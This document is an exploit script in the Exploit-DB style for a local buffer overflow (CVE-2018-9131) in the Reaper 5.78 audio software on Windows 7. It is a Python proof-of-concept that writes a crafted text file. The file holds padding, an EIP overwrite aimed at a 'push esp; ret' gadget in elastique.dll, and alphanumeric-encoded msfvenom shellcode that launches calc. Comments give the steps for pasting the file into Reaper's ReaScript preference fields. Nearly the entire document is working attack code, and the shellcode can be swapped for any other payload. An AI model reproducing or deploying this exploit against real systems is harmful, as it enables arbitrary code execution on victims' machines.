Reaper 5.78 - Local Buffer Overflow

# Exploit Title: Reaper 5.78 - Local Buffer Overflow
# Exploit Author: bzyo
# CVE: CVE-2018-9131
# Date: 2018-03-30
# Vulnerable Software: Reaper 5.78
# Vendor Homepage: https://www.reaper.fm/
# Version: 5.78
# Software Link: https://www.reaper.fm/download.php
# Tested On: Windows 7 x86
#
# lots of bad chars, use alpha_mixed with register
# bad chars \x00\x0a\x0d and everything above \x80
#
# PoC: 
# 1. generate reaper578.txt, copy contents to clipboard
# 2. open app, select Options, select Preferences
# 3. choose ReaScript
# 4. paste reaper578.txt contents into both fields:
#    'Custom path to Python dll directory'
#    'Force ReaScript to use specific Python dll'
# 5. pop calc
#

import struct

filename="reaper578.txt"

junk = "A"*95

#0x10042e5a : push esp # ret  | ascii {PAGE_EXECUTE_READ} [elastique.dll]
eip = struct.pack('<I',0x10042e5a)

#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
#Payload size: 440 bytes
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6d\x52\x35\x50"
"\x35\x50\x65\x50\x75\x30\x6b\x39\x6a\x45\x70\x31\x4f\x30\x65"
"\x34\x4c\x4b\x56\x30\x76\x50\x4c\x4b\x46\x32\x56\x6c\x6e\x6b"
"\x73\x62\x55\x44\x4c\x4b\x71\x62\x51\x38\x36\x6f\x4f\x47\x53"
"\x7a\x56\x46\x66\x51\x49\x6f\x4e\x4c\x67\x4c\x55\x31\x63\x4c"
"\x57\x72\x54\x6c\x57\x50\x79\x51\x4a\x6f\x64\x4d\x67\x71\x49"
"\x57\x4a\x42\x48\x72\x71\x42\x52\x77\x4c\x4b\x52\x72\x46\x70"
"\x4e\x6b\x71\x5a\x47\x4c\x6c\x4b\x30\x4c\x42\x31\x34\x38\x69"
"\x73\x37\x38\x77\x71\x5a\x71\x32\x71\x4c\x4b\x62\x79\x35\x70"
"\x75\x51\x39\x43\x6e\x6b\x71\x59\x32\x38\x4d\x33\x45\x6a\x61"
"\x59\x4c\x4b\x74\x74\x6c\x4b\x43\x31\x4b\x66\x75\x61\x59\x6f"
"\x4c\x6c\x6b\x71\x48\x4f\x46\x6d\x36\x61\x6f\x37\x34\x78\x69"
"\x70\x71\x65\x69\x66\x77\x73\x33\x4d\x58\x78\x77\x4b\x61\x6d"
"\x35\x74\x62\x55\x58\x64\x71\x48\x6e\x6b\x33\x68\x66\x44\x63"
"\x31\x6a\x73\x55\x36\x4c\x4b\x36\x6c\x70\x4b\x6e\x6b\x51\x48"
"\x35\x4c\x65\x51\x7a\x73\x6e\x6b\x44\x44\x6e\x6b\x57\x71\x38"
"\x50\x6d\x59\x53\x74\x56\x44\x75\x74\x43\x6b\x33\x6b\x43\x51"
"\x63\x69\x32\x7a\x36\x31\x49\x6f\x69\x70\x53\x6f\x43\x6f\x63"
"\x6a\x6e\x6b\x56\x72\x6a\x4b\x6c\x4d\x73\x6d\x52\x4a\x46\x61"
"\x4c\x4d\x4e\x65\x6e\x52\x35\x50\x63\x30\x75\x50\x70\x50\x45"
"\x38\x54\x71\x6c\x4b\x72\x4f\x4f\x77\x4b\x4f\x39\x45\x4d\x6b"
"\x6c\x30\x6d\x65\x4d\x72\x52\x76\x72\x48\x4f\x56\x4f\x65\x6d"
"\x6d\x6d\x4d\x4b\x4f\x38\x55\x47\x4c\x43\x36\x43\x4c\x46\x6a"
"\x6d\x50\x49\x6b\x4d\x30\x63\x45\x67\x75\x4f\x4b\x67\x37\x66"
"\x73\x70\x72\x70\x6f\x32\x4a\x33\x30\x72\x73\x69\x6f\x58\x55"
"\x33\x53\x50\x61\x50\x6c\x52\x43\x46\x4e\x52\x45\x33\x48\x70"
"\x65\x37\x70\x41\x41")

#lol 1337
fill = "D"*(1337 - len(calc))

buffer = junk + eip + calc + fill
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()